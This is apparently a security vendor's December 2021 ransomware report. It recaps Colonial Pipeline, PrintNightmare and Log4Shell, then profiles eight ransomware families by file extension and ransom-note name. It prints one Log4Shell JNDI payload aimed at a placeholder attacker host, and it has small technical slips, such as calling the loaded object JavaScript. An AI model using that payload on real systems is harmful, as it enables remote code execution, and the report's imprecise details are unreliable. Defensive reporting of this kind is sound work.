Monthly Ransomware Activity – December 2021

Written by: Maor Huli

In December, the ransomware types that will be introduced will be:

  1. Rook
  2. BlueLocker
  3. Hello
  4. Makop
  5. BigLock
  6. VoidCrypt
  7. Khonsari

EXECUTIVE SUMMARY

Major Cyber Attacks in 2021

In 2021, the world was introduced to the risks and dangers of cyber attacks. Here are three of the major ones, which took the world by storm:

 

1. The Colonial Pipeline Ransomware Attack:

The Colonial Pipeline is the largest pipeline system for refined oil products in the United States. Approximately 45% of all fuel consumed in the East Coast of the US originate from it.

The pipeline consists of two tubes and it is 5,500 miles (approximately 8900 kilometers) long. It can carry up to the astronomical number of 476961884.8 liters of refined oil per day.

On May 7th, 2021, the infamous ransomware group “DarkSide” attacked the Colonial Pipeline.

The group used compromised VPN credentials that were published on the dark web to access the IT system.

The IT department manages everything related to computing technology, such as networking, hardware, software, the Internet, or the people that work with these technologies from home. The attackers gained access to a lot of valuable information, and stole and encrypted it.To contain the attack, the company stopped all operations of the pipeline.

With the help of the FBI, the Colonial Pipliene paid a ransom of $4.4 million within a few hours after the attack. After payment, the attackers sent the company the decryptor application so they could restore their network. Hoever, the decryption operated very slowly.

 

2. A Printing Nightmare:

In mid-July, 2021, the Windows Print Spooler service was found to be vulnerable.

The vulnerability allowed r RCE (Remote Code Execution) exploitation when the system improperly performed privileged operations. An attacker could execute arbitrary code to install applications, along with read, write, change, and delete files. They could even create new accounts with full user rights.

After running malicious commands, it is easy to implement Ransomware, which is exactly what the Vice Society gang did.

This gang usually attacks small-mid businesses, like public schools, educational institutions, and stores.

They usually perform their attacks with a double-extortion method, which meansthat while their program encrypts the system, it also steals the data and leaks it to wevsites located on the dark web.

Microsoft released a final patch of this vulnerability (CVE-2021-34481) on August 10th.

 

3. Log4Shell Vulnerability:

Log4j is part of the Apache logging services. This software allows developers to keep track of their software or online services to identify errors or any other problems and communicate via diagnostic messages to system administrators and users.

In mid-December, an RCE vulnerability was found in the log4j package.

The way that Log4j processes log messages was the root cause of this vulnerability. A log message is passed as a string to be recorded in a log file. The Log4j library has an additional feature that allows log messages to contain variables that are translated on the fly before being written to the log file.

The vulnerability translates a specific argument and loads Java code from another Java class stored on the remote server. While the logging message is being controlled by the user, an attacker can exploit the feature and translate the arguments into a JavaScript object. Then they can execute a malicious payload from their remote server using JNDI.

JNDI is a directory and naming service that enables users to look up and access Java classes by using a variety of naming and directory services SPIs.

When using JNDI in the logging procedure, users can retrieve Java classes from LDAP (Lightweight Directory Access Protocol) server. In case of an attack, the server can be manipulated into the attacker LDAP server by a simple command. For example, ${jndi:ldap://attacker.com/path/to/malicious/java/class}

The Log4J vulnerability, CVE-2021-44228, received the highest risk score: 10

Additional information and a more detailed analysis can be found in the following link:
https://www.cynet.com/log4shell/

CYNET 360 VS RANSOMWARE

“Bleeping Computer” is the most up-to-date and reliable website that covers the newest ransomware variants. At Orion team, which us an integral department of Cynet’s research team, we work around the clock to strengthen the detection capabilities of Cynet 360.

Graphical user interface, website Description automatically generated

 

ROOK Ransomware

Cynet 360 Detections

A screenshot of a computer Description automatically generated with medium confidence

A screenshot of a computer Description automatically generated with medium confidence

 

ROOK Overview

ROOK ransomware renames the encrypted files with .Rook in the extension:

Text Description automatically generated

Once a computer’s files have been encrypted and renamed, it drops a note named HowToRestoreYourFiles.txt.

The ransomware note contains the website link for both the dark web and clear,. It also warns against using in a third party software to restore the files.

Graphical user interface, text, application Description automatically generated Text Description automatically generated

 

BlueLocker Ransomware

Cynet 360 Detections

Graphical user interface, text, application, chat or text message Description automatically generated

A screenshot of a computer Description automatically generated with medium confidence

 

BlueLocker Overview

BlueLocker ransomware renames the encrypted files with a .blue extension for each file:

Text Description automatically generated

Once a computer’s files have been encrypted and renamed, it drops a note as a text (.txt) file named restore_file.txt. The text file contains instructions on how to pay to get the encrypted files back.

Graphical user interface, text, application Description automatically generated Graphical user interface, text, application, email Description automatically generated

 

Hello Ransomware

Cynet 360 Detections

Graphical user interface, application Description automatically generated

Graphical user interface, application Description automatically generated

 

Hello Overview

After execution, Hello ransomware renames the encrypted files with .hello.

Graphical user interface, text, application Description automatically generated

 

Once a computer’s files have been encrypted and renamed, it drops a note as a text (.txt) file named Hello.txt. The text file contains instructions on how to pay to get the encrypted files back.

Application Description automatically generated with low confidence Text Description automatically generated with medium confidence

Text Description automatically generated

 

Makop Ransomware

Cynet 360 Detections

A screenshot of a computer Description automatically generated with medium confidence

Graphical user interface, application Description automatically generated

 

Makop Overview

After execution, Makop ransomware renames the encrypted files with .[0-9A-Z]{8}.[[email protected]].mkp.

Text Description automatically generated

Once a computer’s files have been encrypted and renamed, it drops a note as a text (.txt) file named +README-WARNING+.txt. The text file contains instructions on how to pay to get the encrypted files back.

Graphical user interface, text, application Description automatically generated Graphical user interface, text, application, email Description automatically generated

 

BigLock Ransomware

Cynet 360 Detections

Graphical user interface, text Description automatically generated

A screenshot of a computer Description automatically generated with medium confidence

 

BigLock Overview

Please note that the following information was taken from a third party, since there was no encryption in our lab.

After execution, BigLock ransomware renames the encrypted files with . pandemic | .corona-lock in the extension for each file.

Once a computer’s files have been encrypted and renamed, it drops a note as a text (.txt) file named !!!READ_ME!!!.TXT. The text file contains instructions on how to pay to get the encrypted files back.

Table Description automatically generated

 

VoidCrypt Ransomware

Cynet 360 Detections

Graphical user interface, application Description automatically generated

A screenshot of a computer Description automatically generated with medium confidence

Graphical user interface, text, application Description automatically generated

 

VoidCrypt Overview

After execution, VoidCrypt ransomware renames the encrypted files with ,(MJ-XD[0-9]{10})([email protected]).wixawm in the extension for each file:

Text Description automatically generated

Once a computer’s files have been encrypted and renamed, it drops a note as a text (.txt and .hta) file named Decryption-Guide.txt\.hta. The text file contains instructions on how to pay to get the encrypted files back.

Graphical user interface Description automatically generated with medium confidence Graphical user interface, text, application, email Description automatically generated

 

Khonsari Ransomware

Cynet 360 Detections

Graphical user interface, text, application Description automatically generated

Graphical user interface, text, application Description automatically generated

 

Khonsari Overview

Please note that the following information was taken from a third party resource since there was no encryption in our lab.

After execution, Khonsari ransomware renames the encrypted files with .khonsari in the extension for each file.

A picture containing text, tool Description automatically generated

 

Once a computer’s files have been encrypted and renamed, it drops a note as a text (.txt) file named HOW TO GET YOUR FILES BACK.TXT. The text file contains instructions on how to pay to get the encrypted files back.

Text Description automatically generated

 

Surtr Ransomware

Cynet 360 Detections

A screenshot of a computer Description automatically generated

A screenshot of a computer Description automatically generated with medium confidence

A screenshot of a computer Description automatically generated

 

Surtr Overview

After execution, Surtr ransomware renames the encrypted files with .[[email protected]].SURT in the extension for each file.

Text Description automatically generated

Once a computer’s files have been encrypted and renamed, it drops a note as a text (.txt) file named SURTR_README.txt & .hta. The file contains instructions on how to pay to get the encrypted files back.

Graphical user interface, text, application Description automatically generated Graphical user interface, text, application Description automatically generated

 

Search results for: